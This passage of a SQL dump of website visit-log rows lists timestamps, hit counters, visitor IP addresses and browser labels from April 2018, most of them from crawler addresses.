'other'),(231189,1523112018,1,1,0,0,'54.36.149.87','other'),(231190,1523112077,1,1,0,0,'54.36.148.131','other'),(231191,1523112105,1,1,0,0,'54.36.148.239','other'),(231192,1523112496,1,1,0,0,'54.36.149.5','other'),(231193,1523112847,1,1,0,0,'34.201.164.108','other'),(231194,1523113079,1,1,0,0,'54.36.148.92','other'),(231195,1523113322,2,2,0,0,'216.244.66.237','other'),(231196,1523113430,2,2,0,0,'37.54.17.157','chrome'),(231197,1523113790,1,1,0,0,'34.201.164.108','other'),(231198,1523114016,1,1,0,0,'54.36.149.16','other'),(231199,1523114086,1,1,0,0,'54.36.148.202','other'),(231200,1523114226,1,1,0,0,'54.36.149.36','other'),(231201,1523114693,1,1,0,0,'34.201.164.108','other'),(231202,1523115010,1,1,0,0,'178.154.171.88','other'),(231203,1523115171,1,1,0,0,'8.29.198.26','other'),(231204,1523115447,1,1,0,0,'54.36.149.32','other'),(231205,1523115600,1,1,0,0,'34.201.164.108','other'),(231206,1523115817,2,2,0,0,'46.211.24.201','chrome'),(231207,1523115853,1,1,0,0,'54.36.149.25','other'),(231208,1523115965,1,1,0,0,'54.36.148.90','other'),(231209,1523115989,1,1,0,0,'54.36.148.73','other'),(231210,1523116196,1,1,0,0,'54.36.148.177','other'),(231211,1523116400,1,1,0,0,'54.36.148.229','other'),(231212,1523116519,1,1,0,0,'34.201.164.108','other'),(231213,1523116569,1,1,0,0,'54.36.149.87','other'),(231214,1523116823,1,1,0,0,'141.8.142.74','other'),(231215,1523116854,2,2,0,0,'54.36.148.234','other'),(231216,1523117085,1,1,0,0,'87.250.224.46','other'),(231217,1523117090,1,1,0,0,'54.36.148.82','other'),(231218,1523117091,1,1,0,0,'54.36.149.44','other'),(231219,1523117221,1,1,0,0,'54.36.148.113','other'),(231220,1523117224,1,1,0,0,'54.36.149.89','other'),(231221,1523117252,1,1,0,0,'91.209.11.236','other'),(231222,1523117334,1,1,0,0,'188.230.43.254','other'),(231223,1523117428,1,1,0,0,'34.201.164.108','other'),(231224,1523117451,1,1,0,0,'54.36.149.22','other'),(231225,1523117941,1,1,0,0,'54.36.148.208','other'),(231226,1523118344,1,1,0,0,'34.201.164.108','other'),(231227,1523118539,1,1,0,0,'54.36.149.63','other'),(231228,1523118610,1,1,0,0,'91.196.178.71','firefox'),(231229,1523119037,1,1,0,0,'54.36.148.118','other'),(231230,1523119103,1,1,0,0,'54.36.149.100','other'),(231231,1523119159,1,1,0,0,'54.36.148.94','other'),(231232,1523119251,1,1,0,0,'54.36.149.4','other'),(231233,1523119268,1,1,0,0,'34.201.164.108','other'),(231234,1523119307,1,1,0,0,'54.36.148.247','other'),(231235,1523119732,1,1,0,0,'188.230.43.254','other'),(231236,1523119836,1,1,0,0,'54.36.149.67','other'),(231237,1523119847,1,1,0,0,'54.36.148.31','other'),(231238,1523119896,1,1,0,0,'54.36.148.194','other'),(231239,1523119897,1,1,0,0,'54.36.149.27','other'),(231240,1523119914,1,1,0,0,'54.36.148.105','other'),(231241,1523120024,1,1,0,0,'54.36.148.122','other'),(231242,1523120171,1,1,0,0,'34.201.164.108','other'),(231243,1523120660,1,1,0,0,'54.36.148.32','other'),(231244,1523120716,1,1,0,0,'163.172.255.139','chrome'),(231245,1523120986,1,1,0,0,'54.36.149.47','other'),(231246,1523121033,1,1,0,0,'54.36.148.162','other'),(231247,1523121100,1,1,0,0,'34.201.164.108','other'),(231248,1523121356,1,1,0,0,'54.36.149.51','other'),(231249,1523121466,1,1,0,0,'54.36.148.81','other'),(231250,1523121626,1,1,0,0,'54.36.148.215','other'),(231251,1523121922,1,1,0,0,'54.36.148.172','other'),(231252,1523122050,1,1,0,0,'34.201.164.108','other'),(231253,1523122375,1,1,0,0,'141.8.142.74','other'),(231254,1523122379,2,2,0,0,'178.154.171.88','other'),(231255,1523122804,1,1,0,0,'54.36.148.202','other'),(231256,1523122958,1,1,0,0,'34.201.164.108','other'),(231257,1523123107,1,1,0,0,'54.36.148.113','other'),(231258,1523123267,1,1,0,0,'54.36.148.124','other'),(231259,1523123333,3,3,0,0,'35.226.23.240','other'),(231260,1523123353,1,1,0,0,'157.55.39.132','other'),(231261,1523123534,1,1,0,0,'54.36.148.92','other'),(231262,1523123711,1,1,0,0,'216.244.66.237','other'),(231263,1523123911,1,1,0,0,'34.201.164.108','other'),(231264,1523123978,1,1,0,0,'54.36.148.236','other'),(231265,1523124179,1,1,0,0,'54.36.148.253','other'),(231266,1523124216,1,1,0,0,'54.36.148.201','other'),(231267,1523124466,1,1,0,0,'54.36.149.13','other'),(231268,1523124651,1,1,0,0,'54.36.148.204','other'),(231269,1523124816,1,1,0,0,'34.201.164.108','other'),(231270,1523124847,1,1,0,0,'54.36.148.187','other'),(231271,1523125215,1,1,0,0,'54.36.148.99','other'),(231272,1523125235,1,1,0,0,'54.36.149.89','other'),(231273,1523125309,1,1,0,0,'54.36.148.132','other'),(231274,1523125459,1,1,0,0,'54.36.148.180','other'),(231275,1523125595,1,1,0,0,'54.36.149.103','other'),(231276,1523125623,1,1,0,0,'54.36.148.127','other'),(231277,1523125729,1,1,0,0,'34.201.164.108','other'),(231278,1523126027,1,1,0,0,'8.29.198.26','other'),(231279,1523126131,1,1,0,0,'54.36.148.200','other'),(231280,1523126402,1,1,0,0,'54.36.149.32','other'),(231281,1523126408,1,1,0,0,'216.244.66.237','other'),(231282,1523126505,1,1,0,0,'54.36.148.166','other'),(231283,1523126640,1,1,0,0,'34.201.164.108','other'),(231284,1523126676,1,1,0,0,'157.55.39.132','other'),(231285,1523126896,1,1,0,0,'46.211.121.233','other'),(231286,1523127153,1,1,0,0,'54.36.149.5','other'),(231287,1523127332,1,1,0,0,'54.36.148.33','other'),(231288,1523127590,1,1,0,0,'34.201.164.108','other'),(231289,1523127675,1,1,0,0,'54.36.149.44','other'),(231290,1523127729,1,1,0,0,'54.36.148.51','other'),(231291,1523128088,1,1,0,0,'107.21.1.8','other'),(231292,1523128166,1,1,0,0,'54.36.149.54','other'),(231293,1523128295,1,1,0,0,'66.102.9.40','chrome'),(231294,1523128329,1,1,0,0,'54.36.149.38','other'),(231295,1523128357,1,1,0,0,'54.36.148.231','other'),(231296,1523128363,1,1,0,0,'54.36.148.222','other'),(231297,1523128513,1,1,0,0,'34.201.164.108','other'),(231298,1523128626,1,1,0,0,'54.36.149.55','other'),(231299,1523128627,1,1,0,0,'216.244.66.237','other'),(231300,1523129159,1,1,0,0,'54.36.149.85','other'),(231301,1523129191,1,1,0,0,'54.36.149.102','other'),(231302,1523129205,1,1,0,0,'54.36.148.236','other'),(231303,1523129261,1,1,0,0,'35.226.23.240','other'),(231304,1523129425,1,1,0,0,'54.36.148.129','other'),(231305,1523129440,1,1,0,0,'54.36.149.93','other'),(231306,1523129460,1,1,0,0,'34.201.164.108','other'),(231307,1523129581,1,1,0,0,'54.36.148.136','other'),(231308,1523129602,1,1,0,0,'54.36.148.244','other'),(231309,1523129775,1,0,1,0,'66.249.64.155',''),(231310,1523130002,1,1,0,0,'203.195.188.35','msie'),(231311,1523130403,1,1,0,0,'34.201.164.108','other'),(231312,1523130482,1,1,0,0,'54.36.148.252','other'),(231313,1523130539,1,1,0,0,'54.36.148.51','other'),(231314,1523130959,1,1,0,0,'54.36.148.148','other'),(231315,1523130960,1,1,0,0,'141.8.132.19','other'),(231316,1523130975,1,1,0,0,'37.9.113.100','other'),(231317,1523131089,1,1,0,0,'54.36.148.46','other'),(231318,1523131184,1,1,0,0,'54.36.149.84','other'),(231319,1523131342,1,1,0,0,'34.201.164.108','other'),(231320,1523131491,1,1,0,0,'54.36.149.76','other'),(231321,1523131690,1,1,0,0,'54.36.148.23','other'),(231322,1523131883,1,1,0,0,'54.36.148.78','other'),(231323,1523132133,1,1,0,0,'54.36.148.46','other'),(231324,1523132169,1,1,0,0,'54.36.149.64','other'),(231325,1523132261,1,1,0,0,'34.201.164.108','other'),(231326,1523132427,1,1,0,0,'54.36.148.242','other'),(231327,1523132541,1,1,0,0,'114.101.181.55','opera'),(231328,1523132598,1,1,0,0,'216.244.66.237','other'),(231329,1523132836,1,1,0,0,'54.36.149.26','other'),(231330,1523133068,1,1,0,0,'54.36.148.63','other'),(231331,1523133082,1,1,0,0,'54.36.148.41','other'),(231332,1523133180,1,1,0,0,'34.201.164.108','other'),(231333,1523133695,1,1,0,0,'54.36.149.34','other'),(231334,1523133789,1,1,0,0,'182.86.62.128','opera'),(231335,1523133948,1,1,0,0,'54.36.149.56','other'),(231336,1523134053,1,1,0,0,'54.36.149.62','other'),(231337,1523134068,1,1,0,0,'54.36.148.48','other'),(231338,1523134132,1,1,0,0,'34.201.164.108','other'),(231339,1523134142,2,2,0,0,'216.244.66.237','other'),(231340,1523134151,1,1,0,0,'54.36.148.93','other'),(231341,1523134267,1,1,0,0,'54.36.148.225','other'),(231342,1523135045,1,1,0,0,'34.201.164.108','other'),(231343,1523135167,1,1,0,0,'54.36.148.58','other'),(231344,1523135499,1,1,0,0,'54.36.148.145','other'),(231345,1523135548,1,1,0,0,'54.36.148.86','other'),(231346,1523135560,1,1,0,0,'54.36.149.17','other'),(231347,1523135925,1,1,0,0,'54.36.148.225','other'),(231348,1523135935,1,1,0,0,'54.36.148.117','other'),(231349,1523135984,1,1,0,0,'34.201.164.108','other'),(231350,1523136142,1,1,0,0,'216.244.66.237','other'),(231351,1523136177,1,1,0,0,'54.36.149.75','other'),(231352,1523136281,1,1,0,0,'54.36.148.28','other'),(231353,1523136324,1,1,0,0,'54.36.148.91','other'),(231354,1523136410,1,1,0,0,'54.36.149.22','other'),(231355,1523136622,1,1,0,0,'54.36.148.116','other'),(231356,1523136641,1,1,0,0,'54.36.149.28','other'),(231357,1523136873,1,1,0,0,'54.36.148.215','other'),(231358,1523136883,1,1,0,0,'8.29.198.25','other'),(231359,1523136913,1,1,0,0,'34.201.164.108','other'),(231360,1523137407,2,2,0,0,'35.226.23.240','other'),(231361,1523137421,1,1,0,0,'54.36.148.218','other'),(231362,1523137450,1,1,0,0,'54.36.148.126','other'),(231363,1523137563,1,1,0,0,'54.36.148.229','other'),(231364,1523137808,1,1,0,0,'54.36.148.217','other'),(231365,1523137845,1,1,0,0,'54.36.148.182','other'),(231366,1523138296,1,1,0,0,'54.36.148.18','other'),(231367,1523138393,1,1,0,0,'54.36.149.47','other'),(231368,1523138496,1,1,0,0,'54.36.148.165','other'),(231369,1523138608,1,1,0,0,'54.36.148.230','other'),(231370,1523138619,1,1,0,0,'54.36.148.21','other'),(231371,1523138625,1,1,0,0,'54.36.148.249','other'),(231372,1523138810,1,1,0,0,'54.36.148.190','other'),(231373,1523138815,1,1,0,0,'54.36.149.23','other'),(231374,1523138832,1,1,0,0,'54.36.149.31','other'),(231375,1523138899,1,1,0,0,'54.36.149.92','other'),(231376,1523139143,1,1,0,0,'54.36.149.42','other'),(231377,1523139215,1,1,0,0,'54.36.148.77','other'),(231378,1523139554,1,1,0,0,'54.36.148.11','other'),(231379,1523139570,1,1,0,0,'54.36.148.248','other'),(231380,1523139750,1,1,0,0,'54.36.148.189','other'),(231381,1523139904,1,1,0,0,'54.36.149.102','other'),(231382,1523140002,1,1,0,0,'54.36.149.20','other'),(231383,1523140038,1,1,0,0,'54.36.148.78','other'),(231384,1523140160,1,1,0,0,'54.36.149.104','other'),(231385,1523140213,1,1,0,0,'54.36.148.62','other'),(231386,1523140265,1,1,0,0,'216.244.66.237','other'),(231387,1523140339,1,1,0,0,'54.36.148.22','other'),(231388,1523140550,1,1,0,0,'54.36.149.49','other'),(231389,1523140749,1,1,0,0,'54.36.149.16','other'),(231390,1523140809,1,1,0,0,'207.46.13.58','other'),(231391,1523140840,1,1,0,0,'54.36.148.48','other'),(231392,1523140964,1,1,0,0,'54.36.148.226','other'),(231393,1523141176,1,1,0,0,'54.36.148.109','other'),(231394,1523141443,1,1,0,0,'54.36.149.19','other'),(231395,1523141645,1,1,0,0,'54.36.148.129','other'),(231396,1523142145,1,1,0,0,'54.36.148.72','other'),(231397,1523142219,1,1,0,0,'54.36.148.22','other'),(231398,1523142362,1,1,0,0,'54.36.148.145','other'),(231399,1523142373,1,1,0,0,'216.244.66.237','other'),(231400,1523142406,1,1,0,0,'54.36.148.57','other'),(231401,1523142757,1,1,0,0,'54.36.149.62','other'),(231402,1523142784,1,1,0,0,'54.36.148.220','other'),(231403,1523142854,1,1,0,0,'54.36.148.212','other'),(231404,1523142996,1,1,0,0,'54.36.148.174','other'),(231405,1523143264,1,1,0,0,'54.36.148.245','other'),(231406,1523143267,1,1,0,0,'141.8.142.74','other'),(231407,1523143286,1,1,0,0,'54.36.148.46','other'),(231408,1523143291,1,1,0,0,'54.36.149.16','other'),(231409,1523143378,1,1,0,0,'54.36.148.171','other'),(231410,1523143524,1,1,0,0,'54.36.149.25','other'),(231411,1523143699,1,1,0,0,'54.36.149.77','other'),(231412,1523143804,2,2,0,0,'216.244.66.237','other'),(231413,1523144242,1,1,0,0,'54.36.148.50','other'),(231414,1523144326,1,1,0,0,'54.36.148.140','other'),(231415,1523144489,1,1,0,0,'54.36.148.174','other'),(231416,1523144586,1,1,0,0,'54.36.148.168','other'),(231417,1523144772,1,1,0,0,'54.36.149.71','other'),(231418,1523144962,1,1,0,0,'54.36.148.197','other'),(231419,1523145017,1,1,0,0,'54.36.148.193','other'),(231420,1523145042,1,1,0,0,'216.244.66.237','other'),(231421,1523145066,1,1,0,0,'54.36.149.44','other'),(231422,1523145071,1,1,0,0,'54.36.149.82','other'),(231423,1523145099,1,1,0,0,'54.36.148.81','other'),(231424,1523145281,1,1,0,0,'54.36.148.25','other'),(231425,1523145340,1,1,0,0,'54.36.149.92','other'),(231426,1523145456,1,1,0,0,'54.36.148.236','other'),(231427,1523145499,1,1,0,0,'54.36.148.230','other'),(231428,1523146149,1,1,0,0,'80.248.227.208','other'),(231429,1523146176,1,1,0,0,'54.36.149.65','other'),(231430,1523146259,2,2,0,0,'91.196.178.131','chrome'),(231431,1523146382,1,1,0,0,'54.36.149.104','other'),(231432,1523146442,1,1,0,0,'216.244.66.237','other'),(231433,1523146695,1,1,0,0,'54.36.149.14','other'),(231434,1523146830,1,1,0,0,'54.36.148.224','other'),(231435,1523146895,1,1,0,0,'35.226.23.240','other'),(231436,1523147398,1,1,0,0,'54.36.148.237','other'),(231437,1523147432,1,1,0,0,'54.36.148.178','other'),(231438,1523147724,1,1,0,0,'54.36.149.16','other'),(231439,1523147733,1,1,0,0,'8.29.198.26','other'),(231440,1523147763,1,1,0,0,'54.36.148.144','other'),(231441,1523147847,1,1,0,0,'54.36.148.135','other'),(231442,1523148028,1,1,0,0,'54.36.148.110','other'),(231443,1523148338,1,1,0,0,'54.36.148.130','other'),(231444,1523148980,1,1,0,0,'54.36.148.252','other'),(231445,1523148997,1,1,0,0,'54.36.148.156','other'),(231446,1523149065,2,2,0,0,'216.244.66.237','other'),(231447,1523149289,1,1,0,0,'54.36.149.91','other'),(231448,1523149648,1,1,0,0,'54.36.148.70','other'),(231449,1523149861,1,1,0,0,'87.250.224.46','other'),(231450,1523149911,1,1,0,0,'54.36.149.102','other'),(231451,1523149968,1,1,0,0,'54.36.148.21','other'),(231452,1523150440,1,1,0,0,'178.154.171.88','other'),(231453,1523150473,1,1,0,0,'54.36.148.192','other'),(231454,1523150492,1,1,0,0,'54.36.148.193','other'),(231455,1523150518,1,1,0,0,'54.36.148.135','other'),(231456,1523150635,1,1,0,0,'93.188.37.229','chrome'),(231457,1523151813,1,1,0,0,'54.36.148.216','other'),(231458,1523151899,1,1,0,0,'54.36.148.129','other'),(231459,1523151928,1,1,0,0,'54.36.148.184','other'),(231460,1523152087,1,1,0,0,'54.36.148.50','other'),(231461,1523152106,1,1,0,0,'54.36.149.47','other'),(231462,1523152146,1,1,0,0,'54.36.148.98','other'),(231463,1523152237,2,2,0,0,'54.36.148.16','other'),(231464,1523152506,1,1,0,0,'54.36.148.134','other'),(231465,1523152519,1,1,0,0,'54.36.149.54','other'),(231466,1523152671,2,2,0,0,'54.165.59.7','other'),(231467,1523152929,1,1,0,0,'54.36.148.144','other'),(231468,1523152990,1,1,0,0,'54.36.148.219','other'),(231469,1523153171,1,1,0,0,'54.36.148.25','other'),(231470,1523153358,1,1,0,0,'54.36.149.39','other'),(231471,1523153564,1,1,0,0,'54.36.148.160','other'),(231472,1523153628,1,1,0,0,'54.36.148.214','other'),(231473,1523153775,1,1,0,0,'54.36.148.56','other'),(231474,1523153929,1,1,0,0,'54.36.148.71','other'),(231475,1523154049,1,1,0,0,'54.36.148.80','other'),(231476,1523154269,2,2,0,0,'54.165.59.7','other'),(231477,1523154342,1,1,0,0,'54.36.149.8','other'),(231478,1523154360,1,1,0,0,'54.36.149.47','other'),(231479,1523154374,1,1,0,0,'54.36.148.166','other'),(231480,1523154531,1,1,0,0,'35.196.46.35','other'),(231481,1523154549,1,1,0,0,'54.36.148.209','other'),(231482,1523154686,1,1,0,0,'54.36.148.40','other'),(231483,1523154790,1,1,0,0,'54.36.148.122','other'),(231484,1523154872,1,1,0,0,'54.36.149.87','other'),(231485,1523154995,1,1,0,0,'178.154.171.60','other'),(231486,1523155095,1,1,0,0,'54.36.149.75','other'),(231487,1523155118,1,1,0,0,'54.36.148.250','other'),(231488,1523155246,1,1,0,0,'91.196.178.136','chrome'),(231489,1523155329,1,1,0,0,'54.36.149.17','other'),(231490,1523155365,1,1,0,0,'54.165.59.7','other'),(231491,1523155366,1,1,0,0,'54.36.148.200','other'),(231492,1523155919,1,1,0,0,'54.36.148.98','other'),(231493,1523155959,1,1,0,0,'54.36.148.156','other'),(231494,1523155977,1,1,0,0,'54.36.148.121','other'),(231495,1523156029,1,1,0,0,'54.36.148.234','other'),(231496,1523156156,1,1,0,0,'54.36.148.39','other'),(231497,1523156309,1,1,0,0,'54.36.148.171','other'),(231498,1523156351,1,1,0,0,'141.8.142.74','other'),(231499,1523156397,2,2,0,0,'54.36.148.78','other'),(231500,1523156556,1,1,0,0,'87.250.224.46','other'),(231501,1523156841,1,1,0,0,'54.36.149.27','other'),(231502,1523157149,1,1,0,0,'54.36.148.147','other'),(231503,1523157624,1,1,0,0,'54.36.149.13','other'),(231504,1523157867,1,1,0,0,'54.36.148.208','other'),(231505,1523157959,1,1,0,0,'54.36.149.49','other'),(231506,1523158090,2,2,0,0,'54.36.148.72','other'),(231507,1523158160,1,1,0,0,'54.36.148.50','other'),(231508,1523158166,1,1,0,0,'54.36.148.255','other'),(231509,1523158170,1,1,0,0,'95.132.10.209','chrome'),(231510,1523158318,1,1,0,0,'54.36.148.240','other'),(231511,1523158527,1,1,0,0,'216.244.66.237','other'),(231512,1523158597,1,1,0,0,'8.29.198.25','other'),(231513,1523158646,1,1,0,0,'54.36.149.59','other'),(231514,1523159091,1,1,0,0,'204.13.201.138','msie'),(231515,1523159222,1,1,0,0,'54.36.149.84','other'),(231516,1523159241,1,1,0,0,'52.27.2.86','msie'),(231517,1523159250,1,1,0,0,'118.219.252.196','other'),(231518,1523159253,2,2,0,0,'141.8.142.74','other'),(231519,1523159273,1,1,0,0,'52.200.221.20','msie'),(231520,1523159359,1,1,0,0,'54.36.149.67','other'),(231521,1523159360,1,1,0,0,'178.62.99.175','msie'),(231522,1523159417,1,1,0,0,'54.36.148.222','other'),(231523,1523159614,1,1,0,0,'54.36.148.56','other'),(231524,1523159770,1,1,0,0,'54.36.148.92','other'),(231525,1523160114,1,1,0,0,'54.36.148.70','other'),(231526,1523160473,1,1,0,0,'54.36.149.84','other'),(231527,1523160611,1,1,0,0,'54.36.149.88','other'),(231528,1523160663,1,1,0,0,'54.36.149.96','other'),(231529,1523160975,1,1,0,0,'54.36.149.39','other'),(231530,1523160978,1,1,0,0,'54.36.148.116','other'),(231531,1523161032,1,1,0,0,'54.36.148.29','other'),(231532,1523161117,1,1,0,0,'54.36.148.154','other'),(231533,1523161433,1,1,0,0,'54.36.149.97','other'),(231534,1523162040,1,1,0,0,'54.36.149.22','other'),(231535,1523162090,1,1,0,0,'178.154.171.88','other'),(231536,1523162552,1,1,0,0,'54.36.149.80','other'),(231537,1523162630,1,1,0,0,'54.36.148.84','other'),(231538,1523162711,1,1,0,0,'54.36.149.96','other'),(231539,1523162751,1,1,0,0,'54.36.149.82','other'),(231540,1523162838,1,1,0,0,'54.36.148.151','other'),(231541,1523163221,1,1,0,0,'54.36.148.72','other'),(231542,1523163355,1,1,0,0,'54.36.148.24','other'),(231543,1523163392,1,1,0,0,'54.36.148.120','other'),(231544,1523163892,1,1,0,0,'54.36.149.10','other'),(231545,1523164084,1,1,0,0,'54.36.148.191','other'),(231546,1523164626,1,1,0,0,'54.36.148.167','other'),(231547,1523164741,1,1,0,0,'216.244.66.237','other'),(231548,1523164965,1,1,0,0,'54.36.148.108','other'),(231549,1523165504,1,1,0,0,'193.106.30.99','firefox'),(231550,1523165530,1,1,0,0,'54.36.148.47','other'),(231551,1523165562,2,2,0,0,'54.36.148.53','other'),(231552,1523165597,1,1,0,0,'54.36.148.129','other'),(231553,1523165768,1,1,0,0,'54.36.149.32','other'),(231554,1523165861,1,1,0,0,'54.36.148.215','other'),(231555,1523166261,1,1,0,0,'54.36.149.66','other'),(231556,1523166603,1,1,0,0,'54.36.148.167','other'),(231557,1523166609,1,1,0,0,'54.36.148.153','other'),(231558,1523166788,1,1,0,0,'54.36.148.197','other'),(231559,1523166907,1,1,0,0,'141.8.142.74','other'),(231560,1523166941,1,1,0,0,'54.36.148.27','other'),(231561,1523167090,1,1,0,0,'54.36.149.41','other'),(231562,1523167330,1,1,0,0,'54.36.149.88','other'),(231563,1523167389,1,1,0,0,'54.36.148.90','other'),(231564,1523167551,1,1,0,0,'54.36.148.62','other'),(231565,1523167660,1,1,0,0,'54.36.149.17','other'),(231566,1523167726,1,1,0,0,'54.36.148.41','other'),(231567,1523167993,1,1,0,0,'54.36.148.72','other'),(231568,1523168077,1,1,0,0,'54.36.149.67','other'),(231569,1523168272,1,1,0,0,'54.36.148.57','other'),(231570,1523168304,1,1,0,0,'54.36.149.4','other'),(231571,1523168472,1,1,0,0,'54.36.148.232','other'),(231572,1523168769,1,1,0,0,'54.36.148.117','other'),(231573,1523168788,1,1,0,0,'54.36.148.17','other'),(231574,1523168965,1,1,0,0,'54.36.149.21','other'),(231575,1523169052,2,2,0,0,'54.36.148.53','other'),(231576,1523169437,1,1,0,0,'8.29.198.26','other'),(231577,1523169450,1,1,0,0,'54.36.148.45','other'),(231578,1523169630,1,1,0,0,'54.36.148.76','other'),(231579,1523169697,1,1,0,0,'54.36.148.204','other'),(231580,1523169785,1,1,0,0,'54.36.148.151','other'),(231581,1523169897,1,1,0,0,'207.46.13.146','other'),(231582,1523170152,1,1,0,0,'217.69.133.224','other'),(231583,1523170329,1,1,0,0,'54.36.149.44','other'),(231584,1523170400,1,1,0,0,'54.36.148.196','other'),(231585,1523170525,1,1,0,0,'54.36.149.59','other'),(231586,1523170650,1,1,0,0,'217.69.133.229','other'),(231587,1523170684,1,1,0,0,'54.36.148.187','other'),(231588,1523170837,1,1,0,0,'54.36.149.10','other'),(231589,1523171103,1,1,0,0,'178.154.171.88','other'),(231590,1523171791,1,1,0,0,'188.230.43.254','other'),(231591,1523171898,1,1,0,0,'54.36.148.234','other'),(231592,1523171900,1,1,0,0,'54.36.148.199','other'),(231593,1523171956,1,1,0,0,'54.36.148.73','other'),(231594,1523172034,1,1,0,0,'54.36.149.52','other'),(231595,1523172151,2,2,0,0,'216.244.66.237','other'),(231596,1523172375,1,1,0,0,'54.36.149.68','other'),(231597,1523172541,1,1,0,0,'54.36.148.21','other'),(231598,1523172722,1,1,0,0,'54.36.148.120','other'),(231599,1523172730,1,1,0,0,'54.36.148.125','other'),(231600,1523172751,1,1,0,0,'46.201.135.249','chrome'),(231601,1523172858,1,1,0,0,'54.36.149.103','other'),(231602,1523172913,1,1,0,0,'54.36.148.179','other'),(231603,1523173016,1,1,0,0,'54.36.149.12','other'),(231604,1523173203,1,1,0,0,'54.36.148.62','other'),(231605,1523173445,1,1,0,0,'54.36.149.48','other'),(231606,1523173533,1,1,0,0,'178.154.171.88','other'),(231607,1523173624,1,1,0,0,'54.36.149.67','other'),(231608,1523173647,1,1,0,0,'217.69.133.215','other'),(231609,1523173719,1,1,0,0,'54.36.149.55','other'),(231610,1523174155,1,1,0,0,'54.36.148.70','other'),(231611,1523174274,1,1,0,0,'178.159.37.11','firefox'),(231612,1523174377,1,1,0,0,'54.36.149.62','other'),(231613,1523174408,1,1,0,0,'54.36.149.79','other'),(231614,1523174721,2,2,0,0,'216.244.66.237','other'),(231615,1523174820,1,1,0,0,'54.36.148.190','other'),(231616,1523174856,2,2,0,0,'37.54.17.157','chrome'),(231617,1523175256,1,1,0,0,'178.154.171.88','other'),(231618,1523175534,1,1,0,0,'54.36.148.128','other'),(231619,1523175544,1,1,0,0,'141.8.142.74','other'),(231620,1523175764,1,1,0,0,'54.36.149.62','other'),(231621,1523176410,1,1,0,0,'54.36.148.185','other'),(231622,1523176491,1,1,0,0,'54.36.149.5','other'),(231623,1523176577,1,1,0,0,'54.36.149.57','other'),(231624,1523176764,1,1,0,0,'54.36.149.12','other'),(231625,1523177277,1,1,0,0,'35.226.23.240','other'),(231627,1523177373,1,1,0,0,'54.36.148.155','other'),(231628,1523177773,1,1,0,0,'54.36.148.165','other'),(231629,1523177781,1,1,0,0,'54.36.149.76','other'),(231630,1523178549,1,1,0,0,'40.77.169.27','other'),(231631,1523179431,1,1,0,0,'91.209.11.236','other'),(231632,1523179979,1,1,0,0,'157.55.39.85','other'),(231633,1523180279,1,1,0,0,'8.29.198.27','other'),(231634,1523180748,1,1,0,0,'141.8.142.74','other'),(231635,1523181292,1,1,0,0,'157.55.39.85','other'),(231636,1523182053,1,1,0,0,'91.209.11.236','other'),(231637,1523183219,1,1,0,0,'54.36.148.173','other'),(231638,1523183484,1,1,0,0,'217.69.133.13','other'),(231639,1523183547,1,1,0,0,'54.36.148.156','other'),(231640,1523183808,1,1,0,0,'54.36.148.46','other'),(231641,1523184074,1,1,0,0,'54.36.148.151','other'),(231642,1523184083,1,1,0,0,'54.36.148.217','other'),(231643,1523184379,1,1,0,0,'54.36.148.236','other'),(231644,1523184737,1,1,0,0,'54.36.148.114','other'),(231645,1523184793,1,1,0,0,'54.36.148.213','other'),(231646,1523185126,1,1,0,0,'54.36.148.180','other'),(231647,1523185228,1,1,0,0,'54.36.149.105','other'),(231648,1523185280,1,1,0,0,'216.244.66.237','other'),(231649,1523185360,1,1,0,0,'54.36.148.41','other'),(231650,1523185680,1,1,0,0,'54.36.149.23','other'),(231651,1523185837,1,1,0,0,'54.36.148.223','other'),(231652,1523185954,1,1,0,0,'54.36.148.160','other'),(231653,1523186149,1,1,0,0,'54.36.148.22','other'),(231654,1523186258,1,1,0,0,'54.36.148.152','other'),(231655,1523186276,1,1,0,0,'178.154.171.88','other'),(231656,1523186288,1,1,0,0,'54.36.148.114','other'),(231657,1523186525,1,1,0,0,'216.244.66.237','other'),(231658,1523186547,1,1,0,0,'91.196.178.130','chrome'),(231659,1523186891,1,1,0,0,'54.36.149.59','other'),(231660,1523186901,1,1,0,0,'54.36.148.27','other'),(231661,1523186939,1,1,0,0,'157.55.39.91','other'),(231662,1523187026,1,1,0,0,'54.36.148.115','other'),(231663,1523187067,1,1,0,0,'141.8.142.74','other'),(231664,1523187190,2,2,0,0,'37.54.17.157','chrome'),(231665,1523187252,1,1,0,0,'178.154.171.88','other'),(231666,1523187474,1,1,0,0,'216.244.66.237','other'),(231667,1523187899,1,1,0,0,'54.36.148.219','other'),(231668,1523188224,1,1,0,0,'54.36.148.24','other'),(231669,1523188252,1,1,0,0,'157.55.39.90','other'),(231670,1523188321,1,1,0,0,'54.36.149.97','other'),(231671,1523188385,2,2,0,0,'178.154.171.88','other'),(231672,1523188865,1,1,0,0,'46.211.111.108','other'),(231673,1523188996,1,1,0,0,'54.36.148.85','other'),(231674,1523189009,1,1,0,0,'54.36.148.159','other'),(231675,1523189196,1,1,0,0,'87.250.224.46','other'),(231676,1523189258,1,1,0,0,'54.36.149.43','other'),(231677,1523189430,1,1,0,0,'54.36.149.69','other'),(231678,1523189433,1,1,0,0,'54.36.148.226','other'),(231679,1523189800,1,1,0,0,'54.36.149.73','other'),(231680,1523189828,1,1,0,0,'54.36.148.124','other'),(231681,1523189893,1,1,0,0,'54.36.148.52','other'),(231682,1523189990,1,1,0,0,'54.36.148.43','other'),(231683,1523189993,1,1,0,0,'54.36.148.153','other'),(231684,1523190085,1,1,0,0,'77.121.112.161','firefox'),(231685,1523190232,1,1,0,0,'54.36.148.194','other'),(231686,1523190345,1,1,0,0,'180.76.15.154','other'),(231687,1523190427,1,1,0,0,'54.36.149.49','other'),(231688,1523190464,1,1,0,0,'54.165.59.7','other'),(231689,1523190809,1,1,0,0,'54.36.149.31','other'),(231690,1523190861,1,1,0,0,'54.36.148.164','other'),(231691,1523190887,1,1,0,0,'217.69.133.238','other'),(231692,1523191001,1,1,0,0,'54.36.148.179','other'),(231693,1523191125,1,1,0,0,'8.29.198.25','other'),(231694,1523191535,1,1,0,0,'54.36.148.253','other'),(231695,1523191689,1,1,0,0,'35.170.115.211','other'),(231696,1523191780,1,1,0,0,'54.36.148.178','other'),(231697,1523191805,1,1,0,0,'54.36.148.213','other'),(231698,1523191956,1,1,0,0,'54.36.149.27','other'),(231699,1523192756,1,1,0,0,'54.36.148.209','other'),(231700,1523192760,1,1,0,0,'54.36.148.64','other'),(231701,1523192842,1,1,0,0,'54.36.148.101','other'),(231702,1523192856,1,1,0,0,'54.36.148.163','other'),(231703,1523192913,1,1,0,0,'54.36.148.50','other'),(231704,1523192987,1,1,0,0,'54.36.148.106','other'),(231705,1523193404,1,1,0,0,'54.36.14